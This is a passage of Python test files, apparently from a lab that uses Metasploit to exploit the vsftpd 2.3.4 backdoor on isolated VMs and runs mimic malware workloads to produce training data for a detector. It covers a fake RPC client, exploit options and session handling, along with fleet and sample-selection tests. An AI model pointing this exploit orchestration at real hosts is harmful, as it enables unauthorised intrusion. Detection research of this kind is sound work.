self.calls: list[tuple[str, tuple, dict]] = []
|
||||
self.logged_in = False
|
||||
self._fired = False
|
||||
self._sessions: dict[int, dict[str, Any]] = {}
|
||||
self._sessions_after_fire = sessions_after_fire or {}
|
||||
self.shell_writes: list[tuple[int, str]] = []
|
||||
|
||||
def _record(self, name: str, *args, **kwargs) -> None:
|
||||
self.calls.append((name, args, kwargs))
|
||||
|
||||
def login(self) -> None:
|
||||
self._record("login")
|
||||
self.logged_in = True
|
||||
|
||||
def logout(self) -> None:
|
||||
self._record("logout")
|
||||
self.logged_in = False
|
||||
|
||||
def session_list(self) -> dict[int, dict[str, Any]]:
|
||||
self._record("session_list")
|
||||
return dict(self._sessions)
|
||||
|
||||
def module_execute(self, mtype: str, mname: str, opts: dict) -> dict:
|
||||
self._record("module_execute", mtype, mname, opts)
|
||||
self._fired = True
|
||||
# Simulate sessions appearing after the exploit fires.
|
||||
self._sessions = dict(self._sessions_after_fire)
|
||||
return {"job_id": 7, "uuid": "fake-uuid"}
|
||||
|
||||
def job_stop(self, job_id) -> dict:
|
||||
self._record("job_stop", job_id)
|
||||
return {"result": "success"}
|
||||
|
||||
def session_shell_write(self, sid: int, data: str) -> dict:
|
||||
self._record("session_shell_write", sid, data)
|
||||
if not data.endswith("\n"):
|
||||
data = data + "\n"
|
||||
self.shell_writes.append((sid, data))
|
||||
return {"write_count": str(len(data))}
|
||||
|
||||
def session_shell_read(self, sid: int) -> str:
|
||||
self._record("session_shell_read", sid)
|
||||
return "uid=0(root) gid=0(root)\n"
|
||||
|
||||
def session_stop(self, sid: int) -> dict:
|
||||
self._record("session_stop", sid)
|
||||
self._sessions.pop(sid, None)
|
||||
return {"result": "success"}
|
||||
|
||||
|
||||
def _make_driver(
|
||||
sessions_after_fire: dict[int, dict[str, Any]] | None = None,
|
||||
target_ip: str = "10.200.0.10",
|
||||
) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]:
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire)
|
||||
events: list[tuple[str, dict]] = []
|
||||
|
||||
def emit(event: str, **extra: Any) -> None:
|
||||
events.append((event, extra))
|
||||
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(
|
||||
target_ip=target_ip,
|
||||
session_open_timeout_s=0.5, # tests must not block
|
||||
),
|
||||
emit_event=emit,
|
||||
)
|
||||
return driver, client, events
|
||||
|
||||
|
||||
def test_driver_setup_authenticates_and_snapshots_sessions() -> None:
|
||||
driver, client, events = _make_driver()
|
||||
client._sessions = {99: {"type": "shell"}} # pre-existing session
|
||||
driver.setup()
|
||||
assert client.logged_in is True
|
||||
assert driver._sessions_seen_at_arm == {99}
|
||||
assert events[0][0] == "driver_setup"
|
||||
assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor"
|
||||
assert events[0][1]["target_ip"] == "10.200.0.10"
|
||||
|
||||
|
||||
def test_full_phase_walk_emits_expected_event_order() -> None:
|
||||
driver, client, events = _make_driver(
|
||||
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}},
|
||||
)
|
||||
driver.setup()
|
||||
for phase in [
|
||||
"clean", "armed", "infecting",
|
||||
"infected_running", "dormant",
|
||||
"infected_running", "dormant",
|
||||
"clean",
|
||||
]:
|
||||
driver.set_phase(phase)
|
||||
driver.teardown()
|
||||
|
||||
names = [e[0] for e in events]
|
||||
# Order matters: fire comes before session_open, which comes before
|
||||
# workload, which comes before kill+logout.
|
||||
assert names.index("exploit_fire") < names.index("session_open")
|
||||
assert names.index("session_open") < names.index("session_landing_probe")
|
||||
assert names.index("session_landing_probe") < names.index("sample_executed")
|
||||
assert names.count("sample_executed") == 2 # two infected_running phases
|
||||
assert names.count("session_dormant") == 2
|
||||
assert "session_killed" in names
|
||||
|
||||
# Driver should have asked the FakeClient to fire exactly once.
|
||||
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
|
||||
assert len(fire_calls) == 1
|
||||
_, args, _ = fire_calls[0]
|
||||
assert args[1] == "unix/ftp/vsftpd_234_backdoor"
|
||||
assert args[2]["RHOSTS"] == "10.200.0.10"
|
||||
assert args[2]["PAYLOAD"] == "cmd/unix/interact"
|
||||
|
||||
|
||||
def test_session_open_timeout_emits_timeout_event() -> None:
|
||||
# No sessions ever appear after fire.
|
||||
driver, client, events = _make_driver(sessions_after_fire={})
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
names = [e[0] for e in events]
|
||||
assert "session_open_timeout" in names
|
||||
assert "session_open" not in names
|
||||
|
||||
|
||||
def test_workload_phases_are_no_op_without_session() -> None:
|
||||
driver, client, events = _make_driver(sessions_after_fire={})
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting") # times out, no session
|
||||
driver.set_phase("infected_running")
|
||||
driver.set_phase("dormant")
|
||||
# No shell writes should have happened.
|
||||
assert client.shell_writes == []
|
||||
|
||||
|
||||
def test_arm_is_idempotent() -> None:
|
||||
driver, client, events = _make_driver(
|
||||
sessions_after_fire={1: {"type": "shell"}},
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("armed")
|
||||
fire_calls = [c for c in client.calls if c[0] == "module_execute"]
|
||||
assert len(fire_calls) == 1
|
||||
|
||||
|
||||
def test_teardown_kills_session_and_logs_out() -> None:
|
||||
driver, client, events = _make_driver(
|
||||
sessions_after_fire={1: {"type": "shell"}},
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.teardown()
|
||||
assert any(c[0] == "session_stop" for c in client.calls)
|
||||
assert client.logged_in is False
|
||||
assert any(e[0] == "session_killed" for e in events)
|
||||
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Driver wired into a real EpisodeRunner — events land in events.jsonl
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
# -----------------------------------------------------------------------
|
||||
# Driver v2 — sample-profile-driven workloads
|
||||
# -----------------------------------------------------------------------
|
||||
|
||||
def test_v2_uses_profile_workload_for_cpu_saturate() -> None:
|
||||
"""When constructed with a Sample, the driver should send the
|
||||
profile's start_cmd at infected_running rather than the v1
|
||||
yes-loop. The actual command body is owned by exploits.workloads
|
||||
and tested there; here we just confirm dispatch."""
|
||||
from samples.manifest import Sample as _Sample
|
||||
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(
|
||||
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
|
||||
)
|
||||
events: list[tuple[str, dict]] = []
|
||||
sample = _Sample(
|
||||
name="xmrig-cryptominer",
|
||||
family="XMRig",
|
||||
category="cryptominer",
|
||||
profile="cpu-saturate",
|
||||
)
|
||||
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
|
||||
emit_event=lambda ev, **kw: events.append((ev, kw)),
|
||||
sample=sample,
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.set_phase("infected_running")
|
||||
driver.set_phase("dormant")
|
||||
driver.teardown()
|
||||
|
||||
# The shell command sent at infected_running should be the
|
||||
# profile's multi-line wrapper — NOT the v1 single-yes line.
|
||||
starts = [w for (_, w) in client.shell_writes if "yes > /dev/null" in w and "cis490-workload" not in w]
|
||||
assert starts == [], "v2 driver must not send the v1 yes-loop when a Sample is supplied"
|
||||
|
||||
# The driver_setup event records sample + workload metadata.
|
||||
setup_events = [kw for (e, kw) in events if e == "driver_setup"]
|
||||
assert setup_events
|
||||
assert setup_events[0]["sample"] == "xmrig-cryptominer"
|
||||
assert setup_events[0]["sample_kind"] == "mimic"
|
||||
assert setup_events[0]["workload_profile"] == "cpu-saturate"
|
||||
|
||||
# sample_executed carries the profile name + description.
|
||||
se = [kw for (e, kw) in events if e == "sample_executed"]
|
||||
assert se
|
||||
assert se[0]["profile"] == "cpu-saturate"
|
||||
assert se[0]["sample"] == "xmrig-cryptominer"
|
||||
|
||||
|
||||
def test_v2_distinct_workloads_per_profile() -> None:
|
||||
"""Two different profiles must produce *different* shell commands.
|
||||
This is the property that gives the ML model varied envelopes to
|
||||
learn from."""
|
||||
from exploits.workloads import all_profiles, workload_for
|
||||
from samples.manifest import Sample as _Sample
|
||||
|
||||
profiles = all_profiles()
|
||||
assert len(profiles) >= 4
|
||||
seen_starts: set[str] = set()
|
||||
for p in profiles:
|
||||
s = _Sample(name=f"x-{p}", family="X", category="rat", profile=p)
|
||||
w = workload_for(s)
|
||||
assert w is not None
|
||||
seen_starts.add(w.start_cmd)
|
||||
# Every profile must have a distinct start_cmd.
|
||||
assert len(seen_starts) == len(profiles), \
|
||||
"two profiles produced the same workload — ML diversity is at risk"
|
||||
|
||||
|
||||
def test_v2_unknown_profile_falls_back_to_cpu_saturate() -> None:
|
||||
from exploits.workloads import workload_for
|
||||
from samples.manifest import Sample as _Sample
|
||||
|
||||
s = _Sample(name="weird", family="X", category="rat", profile="not-a-real-profile")
|
||||
w = workload_for(s)
|
||||
assert w is not None
|
||||
assert w.profile == "cpu-saturate"
|
||||
|
||||
|
||||
def test_v1_path_still_works_when_no_sample() -> None:
|
||||
"""Ensure backwards compat: a driver constructed without a sample
|
||||
uses the original yes-loop workload."""
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(sessions_after_fire={1: {"type": "shell"}})
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
|
||||
emit_event=lambda *a, **kw: None,
|
||||
)
|
||||
driver.setup()
|
||||
driver.set_phase("armed")
|
||||
driver.set_phase("infecting")
|
||||
driver.set_phase("infected_running")
|
||||
driver.teardown()
|
||||
assert any("yes > /dev/null" in w for (_, w) in client.shell_writes)
|
||||
|
||||
|
||||
def test_driver_events_persist_to_events_jsonl(tmp_path: Path) -> None:
|
||||
"""When the driver is connected to a real EpisodeRunner, the
|
||||
events it emits must show up in the episode's events.jsonl with
|
||||
monotonic-clock timestamps (so labels and exploit events can be
|
||||
correlated downstream)."""
|
||||
import os
|
||||
|
||||
from orchestrator.episode import EpisodeConfig, EpisodeRunner
|
||||
|
||||
cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
|
||||
client = FakeMSFRpcClient(
|
||||
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "x:21"}},
|
||||
)
|
||||
|
||||
schedule = [
|
||||
("clean", 0.05),
|
||||
("armed", 0.05),
|
||||
("infecting", 0.05),
|
||||
("infected_running", 0.05),
|
||||
("dormant", 0.05),
|
||||
("clean", 0.05),
|
||||
]
|
||||
ec = EpisodeConfig(
|
||||
target_pid=os.getpid(),
|
||||
duration_s=sum(d for _, d in schedule),
|
||||
interval_ms=20,
|
||||
data_root=tmp_path,
|
||||
phase_schedule=schedule,
|
||||
)
|
||||
runner = EpisodeRunner(ec)
|
||||
driver = MSFExploitDriver(
|
||||
client=client, # type: ignore[arg-type]
|
||||
module=cfg,
|
||||
cfg=DriverConfig(target_ip="10.200.0.10", session_open_timeout_s=0.5),
|
||||
emit_event=runner.emit_event,
|
||||
)
|
||||
runner.on_phase = driver.set_phase
|
||||
driver.setup()
|
||||
try:
|
||||
result = runner.run()
|
||||
finally:
|
||||
driver.teardown()
|
||||
|
||||
events = [
|
||||
json.loads(line)
|
||||
for line in (result.episode_dir / "events.jsonl").read_text().splitlines()
|
||||
]
|
||||
names = [e["event"] for e in events]
|
||||
assert "snapshot_load" in names
|
||||
assert "driver_setup" in names
|
||||
assert "exploit_fire" in names
|
||||
assert "session_open" in names
|
||||
assert "sample_executed" in names
|
||||
assert "session_dormant" in names
|
||||
assert "episode_end" in names
|
||||
|
||||
# Driver events must carry monotonic timestamps in episode-relative
|
||||
# order (snapshot_load is essentially at origin, exploit_fire later,
|
||||
# session_open later still, episode_end last).
|
||||
by_name = {e["event"]: e for e in events}
|
||||
assert by_name["snapshot_load"]["t_mono_ns"] < 1_000_000 # <1ms after origin
|
||||
assert by_name["exploit_fire"]["t_mono_ns"] > by_name["snapshot_load"]["t_mono_ns"]
|
||||
assert by_name["session_open"]["t_mono_ns"] >= by_name["exploit_fire"]["t_mono_ns"]
|
||||
assert by_name["episode_end"]["t_mono_ns"] >= by_name["session_open"]["t_mono_ns"]
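Reviewer note: the ordering assertions above rely on every event carrying a `t_mono_ns` field measured from a single episode origin. The sketch below shows a minimal writer with that property. `EventLog`, `read_events`, `demo` and the `session_id` field are hypothetical; the real `EpisodeRunner.emit_event` is not part of this hunk and may differ.

```python
import json
import tempfile
import time
from pathlib import Path
from typing import Any


class EventLog:
    """Append-only JSONL writer with episode-relative monotonic timestamps."""

    def __init__(self, path: Path) -> None:
        self._path = path
        self._origin_ns = time.monotonic_ns()  # the episode origin

    def emit_event(self, event: str, **extra: Any) -> None:
        record = {
            "event": event,
            "t_mono_ns": time.monotonic_ns() - self._origin_ns,
            **extra,
        }
        with self._path.open("a", encoding="utf-8") as f:
            f.write(json.dumps(record) + "\n")


def read_events(path: Path) -> list[dict[str, Any]]:
    return [json.loads(line) for line in path.read_text(encoding="utf-8").splitlines()]


def demo() -> list[dict[str, Any]]:
    """Write three events to a temp file and read them back."""
    with tempfile.TemporaryDirectory() as tmp:
        path = Path(tmp) / "events.jsonl"
        log = EventLog(path)
        log.emit_event("exploit_fire", module="unix/ftp/vsftpd_234_backdoor")
        log.emit_event("session_open", session_id=1)  # field name is illustrative
        log.emit_event("episode_end")
        return read_events(path)
```

Because `time.monotonic_ns()` never goes backwards, timestamps written in call order are non-decreasing, which is exactly what the `>=` comparisons in the test check.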
|
||||
392
tests/test_fleet.py
Normal file
|
|
@@ -0,0 +1,392 @@
|
|||
"""Tests for fleet capacity calculation + sample manifest selection.
|
||||
|
||||
Capacity is unit-tested via deterministic monkeypatching of /proc and
|
||||
os.cpu_count so the math is exercised independently of the host
|
||||
running the suite. Sample selection has its own tests covering the
|
||||
"different hosts pick different samples" property.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from orchestrator import fleet
|
||||
from samples.manifest import Sample, SampleManifest
|
||||
|
||||
|
||||
REPO_ROOT = Path(__file__).resolve().parent.parent
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Capacity
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _patch_capacity_inputs(
|
||||
monkeypatch,
|
||||
*,
|
||||
cores: int,
|
||||
ram_total_mib: int,
|
||||
ram_available_mib: int,
|
||||
load_1m: float = 0.0,
|
||||
) -> None:
|
||||
monkeypatch.setattr(fleet.os, "cpu_count", lambda: cores)
|
||||
monkeypatch.setattr(
|
||||
fleet, "_read_meminfo",
|
||||
lambda: {
|
||||
"MemTotal": ram_total_mib * 1024 * 1024,
|
||||
"MemAvailable": ram_available_mib * 1024 * 1024,
|
||||
},
|
||||
)
|
||||
monkeypatch.setattr(fleet, "_read_loadavg", lambda: load_1m)
|
||||
|
||||
|
||||
def test_capacity_8core_idle_box(monkeypatch) -> None:
|
||||
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
assert c.cores_total == 8
|
||||
assert c.cores_reserved == 1 # 8 // 8 = 1
|
||||
assert c.max_by_cores == 7
|
||||
# Plenty of RAM, idle → cores binding.
|
||||
assert c.max_concurrent == 7
|
||||
assert "binding=cores" in c.rationale
|
||||
|
||||
|
||||
def test_capacity_low_ram_caps_below_cores(monkeypatch) -> None:
|
||||
# 8 cores but only ~2 GiB free → ram caps below cores.
|
||||
_patch_capacity_inputs(monkeypatch, cores=8, ram_total_mib=4096, ram_available_mib=2048)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
# headroom = max(1024, 4096//8) = 1024
|
||||
# max_by_ram = (2048 - 1024) // 320 = 3
|
||||
assert c.max_by_ram == 3
|
||||
assert c.max_concurrent == 3
|
||||
|
||||
|
||||
def test_capacity_high_load_halves_concurrency(monkeypatch) -> None:
|
||||
# 8 cores, plenty of RAM, but load_1m / cores > 0.75
|
||||
_patch_capacity_inputs(
|
||||
monkeypatch, cores=8, ram_total_mib=16384, ram_available_mib=14000,
|
||||
load_1m=7.0, # 7/8 = 0.875 > 0.75
|
||||
)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
# max_by_cores = 7; max_by_load = max(1, 7//2) = 3
|
||||
assert c.max_by_load == 3
|
||||
assert c.max_concurrent == 3
|
||||
|
||||
|
||||
def test_capacity_pi5_class(monkeypatch) -> None:
|
||||
"""4 cores + 8 GiB → reserve 1 core, run 3 concurrent."""
|
||||
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=7951, ram_available_mib=5223)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
assert c.cores_total == 4
|
||||
assert c.max_concurrent == 3
|
||||
|
||||
|
||||
def test_capacity_minimal_box(monkeypatch) -> None:
|
||||
"""1-core 1 GiB host shouldn't try to run any VMs."""
|
||||
_patch_capacity_inputs(monkeypatch, cores=1, ram_total_mib=1024, ram_available_mib=512)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
assert c.max_concurrent == 0
|
||||
|
||||
|
||||
def test_capacity_to_dict_round_trips(monkeypatch) -> None:
|
||||
_patch_capacity_inputs(monkeypatch, cores=4, ram_total_mib=8000, ram_available_mib=6000)
|
||||
c = fleet.detect_capacity(ram_per_vm_mib=320)
|
||||
d = c.to_dict()
|
||||
assert d["cores_total"] == 4
|
||||
assert d["max_concurrent"] == c.max_concurrent
|
||||
assert "rationale" in d
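Reviewer note: the arithmetic the capacity tests pin down can be read off their inline comments. The sketch below reconstructs it as a pure function. It is inferred from the tests only and is not `fleet.detect_capacity`; in particular the `max(1, cores // 8)` reservation and the clamping to zero are assumptions chosen to agree with the five cases above. `CapacityEstimate` and `estimate_capacity` are hypothetical names.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class CapacityEstimate:
    max_by_cores: int
    max_by_ram: int
    max_by_load: int
    max_concurrent: int


def estimate_capacity(
    *,
    cores: int,
    ram_total_mib: int,
    ram_available_mib: int,
    load_1m: float = 0.0,
    ram_per_vm_mib: int = 320,
) -> CapacityEstimate:
    # Assumed: keep one core per eight (at least one) for the host itself.
    cores_reserved = max(1, cores // 8)
    max_by_cores = max(0, cores - cores_reserved)

    # Leave 1 GiB or an eighth of total RAM free, whichever is larger.
    headroom_mib = max(1024, ram_total_mib // 8)
    max_by_ram = max(0, (ram_available_mib - headroom_mib) // ram_per_vm_mib)

    # A busy host (1-minute load above 75% of cores) gets half the core budget.
    if cores > 0 and load_1m / cores > 0.75:
        max_by_load = max(1, max_by_cores // 2)
    else:
        max_by_load = max_by_cores

    # The tightest of the three limits is the binding one.
    return CapacityEstimate(
        max_by_cores,
        max_by_ram,
        max_by_load,
        min(max_by_cores, max_by_ram, max_by_load),
    )
```

For the 8-core, 4096 MiB case the headroom is 1024 MiB, so RAM allows (2048 - 1024) // 320 = 3 VMs while cores allow 7, and RAM is the binding limit.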
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Sample manifest
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_repo_manifest_loads() -> None:
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
assert len(m) >= 4
|
||||
# Every entry has required fields.
|
||||
for s in m.samples:
|
||||
assert s.name and s.family and s.category and s.profile
|
||||
# All "mimic" today; will switch as real samples are added.
|
||||
assert all(s.kind == "mimic" for s in m.samples)
|
||||
|
||||
|
||||
def test_selection_is_deterministic() -> None:
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
a = m.select(host_id="lab-1", slot=2, episode_index=5)
|
||||
b = m.select(host_id="lab-1", slot=2, episode_index=5)
|
||||
assert a is b
|
||||
|
||||
|
||||
def test_selection_differs_across_hosts() -> None:
|
||||
"""Two hosts on the same slot/episode should generally hit
|
||||
different samples (probabilistic — assert distribution, not
|
||||
individual equality).
|
||||
"""
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
if len(m) < 2:
|
||||
pytest.skip("manifest too small for diversity check")
|
||||
matches = 0
|
||||
for slot in range(20):
|
||||
a = m.select(host_id="alice", slot=slot, episode_index=0)
|
||||
b = m.select(host_id="bob", slot=slot, episode_index=0)
|
||||
if a is b:
|
||||
matches += 1
|
||||
# If the catalog has N samples, naive collision rate ~1/N. With
|
||||
# 20 trials and N≥4 we expect ~5 matches or fewer; fail only at 15 or more.
|
||||
assert matches < 15, "host_id seed isn't producing variety"
|
||||
|
||||
|
||||
def test_selection_walks_catalog_across_episodes() -> None:
|
||||
"""A single host over many episodes should hit every sample at
|
||||
least once."""
|
||||
m = SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml")
|
||||
seen = set()
|
||||
for ep in range(200):
|
||||
seen.add(m.select(host_id="lab-x", slot=0, episode_index=ep).name)
|
||||
assert len(seen) == len(m), f"only saw {len(seen)}/{len(m)} samples"
|
||||
|
||||
|
||||
def test_manifest_rejects_missing_required_field(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "x"\n'
|
||||
'family = "y"\n'
|
||||
'# missing category\n'
|
||||
'profile = "z"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="category"):
|
||||
SampleManifest.load(p)
|
||||
|
||||
|
||||
def test_manifest_rejects_unknown_category(tmp_path: Path) -> None:
|
||||
p = tmp_path / "bad.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "x"\n'
|
||||
'family = "y"\n'
|
||||
'category = "fish"\n'
|
||||
'profile = "z"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="category"):
|
||||
SampleManifest.load(p)
|
||||
|
||||
|
||||
def test_manifest_rejects_duplicate_names(tmp_path: Path) -> None:
|
||||
p = tmp_path / "dup.toml"
|
||||
p.write_text(
|
||||
'[[sample]]\n'
|
||||
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
'\n[[sample]]\n'
|
||||
'name = "x"\nfamily = "y"\ncategory = "rat"\nprofile = "z"\n'
|
||||
)
|
||||
with pytest.raises(ValueError, match="duplicate"):
|
||||
SampleManifest.load(p)
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fleet dispatch — Tier 3 vs Tier 2 selection + per-slot module rotation
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class _RecordingPopen:
|
||||
"""Replacement for subprocess.run that just records what it would
|
||||
have invoked. Returns a returncode-0 result."""
|
||||
calls: list[dict] = []
|
||||
|
||||
def __init__(self, args, **kwargs) -> None:
|
||||
# Mimic CompletedProcess shape.
|
||||
type(self).calls.append({"args": args, "env": kwargs.get("env"), "cwd": kwargs.get("cwd")})
|
||||
self.returncode = 0
|
||||
self.stdout = b""
|
||||
self.stderr = b""
|
||||
|
||||
|
||||
def _fleet_cfg_with_modules(tmp_path: Path, *, force_tier2: bool = False):
|
||||
from exploits.modules import load_module_configs
|
||||
from orchestrator import fleet
|
||||
from samples.manifest import SampleManifest
|
||||
|
||||
repo_root = REPO_ROOT
|
||||
return fleet.FleetConfig(
|
||||
host_id="test-host",
|
||||
repo_root=repo_root,
|
||||
data_root=tmp_path,
|
||||
manifest=SampleManifest.load(repo_root / "samples" / "manifest.toml"),
|
||||
modules=load_module_configs(repo_root / "exploits" / "modules"),
|
||||
force_tier2=force_tier2,
|
||||
)
|
||||
|
||||
|
||||
def _patch_subprocess(monkeypatch):
|
||||
from orchestrator import fleet
|
||||
_RecordingPopen.calls = []
|
||||
monkeypatch.setattr(fleet.subprocess, "run", _RecordingPopen)
|
||||
|
||||
|
||||
def test_fleet_dispatches_to_tier3_when_msfrpcd_listening(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
|
||||
assert res.tier == "tier3", res
|
||||
assert res.module_name in cfg.modules
|
||||
cmd = _RecordingPopen.calls[-1]["args"]
|
||||
# The Tier-3 runner is what gets invoked.
|
||||
assert any("run_tier3_demo.py" in str(a) for a in cmd)
|
||||
# The module name is plumbed through.
|
||||
assert "--module" in cmd
|
||||
assert res.module_name in cmd
|
||||
|
||||
|
||||
def test_fleet_falls_back_to_tier2_when_msfrpcd_down(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: False)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
|
||||
assert res.tier == "tier2"
|
||||
assert res.module_name is None
|
||||
cmd = _RecordingPopen.calls[-1]["args"]
|
||||
assert any("run_real_vm_demo.py" in str(a) for a in cmd)
|
||||
|
||||
|
||||
def test_fleet_falls_back_to_tier2_when_module_catalog_empty(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
from samples.manifest import SampleManifest
|
||||
cfg = fleet.FleetConfig(
|
||||
host_id="test-host",
|
||||
repo_root=REPO_ROOT,
|
||||
data_root=tmp_path,
|
||||
manifest=SampleManifest.load(REPO_ROOT / "samples" / "manifest.toml"),
|
||||
modules={}, # explicitly empty
|
||||
)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
assert res.tier == "tier2"
|
||||
|
||||
|
||||
def test_fleet_force_tier2_overrides_msfrpcd(monkeypatch, tmp_path) -> None:
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path, force_tier2=True)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=0, capacity=capacity)
|
||||
assert res.tier == "tier2"
|
||||
|
||||
|
||||
def test_fleet_skips_requires_bridge_modules_when_no_bridge(monkeypatch, tmp_path) -> None:
|
||||
"""Fleet must filter out callback-payload modules when BRIDGE is
|
||||
unset — otherwise the exploit fires but the session never lands
|
||||
and the episode degenerates to a 30 s session_open_timeout."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
monkeypatch.delenv("BRIDGE", raising=False)
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
seen_modules = set()
|
||||
for ep in range(20):
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
|
||||
if res.tier == "tier3" and res.module_name:
|
||||
seen_modules.add(res.module_name)
|
||||
|
||||
# Every selected module must be callback-free (same-socket).
|
||||
callback_modules = {
|
||||
m.name for m in cfg.modules.values() if m.requires_bridge
|
||||
}
|
||||
assert callback_modules, "test setup error: expected some requires_bridge modules"
|
||||
assert not (seen_modules & callback_modules), \
|
||||
f"selected callback modules without BRIDGE: {seen_modules & callback_modules}"
|
||||
|
||||
|
||||
def test_fleet_uses_all_modules_when_bridge_set(monkeypatch, tmp_path) -> None:
|
||||
"""With BRIDGE set, the full catalog (including reverse/bind shell
|
||||
payloads) is in rotation."""
|
||||
from orchestrator import fleet
|
||||
cfg = _fleet_cfg_with_modules(tmp_path)
|
||||
monkeypatch.setattr(fleet, "_msfrpcd_available", lambda *a, **kw: True)
|
||||
monkeypatch.setenv("BRIDGE", "br-malware")
|
||||
_patch_subprocess(monkeypatch)
|
||||
capacity = fleet.detect_capacity()
|
||||
|
||||
sample = cfg.manifest.samples[0]
|
||||
seen = set()
|
||||
for ep in range(40):
|
||||
res = fleet._run_slot(cfg, slot=0, sample=sample, episode_index=ep, capacity=capacity)
|
||||
if res.tier == "tier3" and res.module_name:
|
||||
seen.add(res.module_name)
|
||||
assert seen == set(cfg.modules.keys()), \
|
||||
f"only saw {seen}/{set(cfg.modules.keys())}"
|
||||
|
||||
|
||||
def test_fleet_propagates_bridge_env_to_runner(monkeypatch, tmp_path) -> None:
